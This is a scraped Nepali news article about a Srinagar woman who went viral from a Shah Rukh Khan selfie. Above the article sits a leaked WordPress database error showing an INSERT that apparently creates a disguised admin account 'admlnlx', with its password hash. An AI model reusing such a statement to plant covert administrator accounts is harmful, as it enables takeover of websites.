WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrsbCS2VOMx2ENLzFuIhOoyWT8QAvj/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-27 13:54:36', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २१-
कहिले कहिँ नसोचेको हुन्छ । त्यस्तै भयो एक युवतीको जीवनमा पनि । उनको नाम हो, साइमा हुसेन । उमेर २१ बर्ष ।
काश्मीरको राजधानी श्रीनगरमा बस्ने यी युवती अहिले सोशल मीडियामा भाइरल बनेकी छिन् । त्यो पनि एउटै सेल्फीको भरमा । भएको के भने, त्यसताका शाहरुख आफ्नो फिल्म ‘रइस’को प्रमोसनमा थिए । सोहि दौरान उनी पुणेको सिम्बिओसिस कलेज पुगे ।
त्यहाँ शाहरुखले आफ्ना प्रशंसकसँग सेल्फी लिए र सोशल मीडियामा पोस्ट गरे । कस्तो भइदियो भने, त्यही सेल्फीले एक अपरिचित युवतीलाई भाइरल बनाइदियो । उक्त सेल्फीको कमेन्टमा शाहरुखको भन्दा ‘मिस्ट्री गर्ल’बारे चर्चा भयो ।
शाहरुखको फेसबुक पेजमा कमेन्ट गर्दै कतिले त उक्त युवतीसँग बिहेको प्रस्ताव पनि राखेका छन् । यद्यपी इन्टरनेटमा आफ्नो फोटोले सनसनी मच्याइरहँदासम्म युवती वेखबर थिइन् । ‘मलाई मेरी साथीले यो खबर सुनाइन्’ साइमाले भनेकी छिन्, ‘विश्वास गर्नै गाह्रो भयो । तर, त्यसपछि निरन्तर म्यासेज र फोन आउन थाले ।’